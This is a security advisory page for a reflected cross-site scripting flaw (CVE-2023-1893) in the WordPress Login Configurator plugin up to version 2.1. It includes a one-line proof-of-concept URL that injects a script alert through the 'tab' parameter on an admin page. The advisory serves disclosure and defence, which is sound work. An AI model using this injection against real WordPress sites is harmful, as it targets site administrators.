WordPress Login Configurator 2.1 Cross Site Scripting

2023.07.27

Credit: Taurus Omar

Risk: Low

Local: No

Remote: Yes

CVE: CVE-2023-1893

CWE: CWE-79

Tittle:
WordPress Plugin Login Configurator <= 2.1 - Reflected Cross-Site Scripting
References:
CVE-2023-1893
Author:
Taurus Omar
Description:
The plugin does not properly escape a URL parameter before outputting it to the page, leading to a reflected cross-site scripting vulnerability targeting site administrators.
Affects Plugins:
Login Configurator - No known fix - plugin closed
Proof of Concept:
Visit the following path:
/wp-admin/options-general.php?page=login-configurator-options&tab=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E#top
Classification:
Type XSS
OWASP top 10 A7: Cross-Site Scripting (XSS)
CWE-79
wpScan:
https://wpscan.com/vulnerability/dbe6cf09-971f-42e9-b744-9339454168c7

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

WordPress Login Configurator 2.1 Cross Site Scripting

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.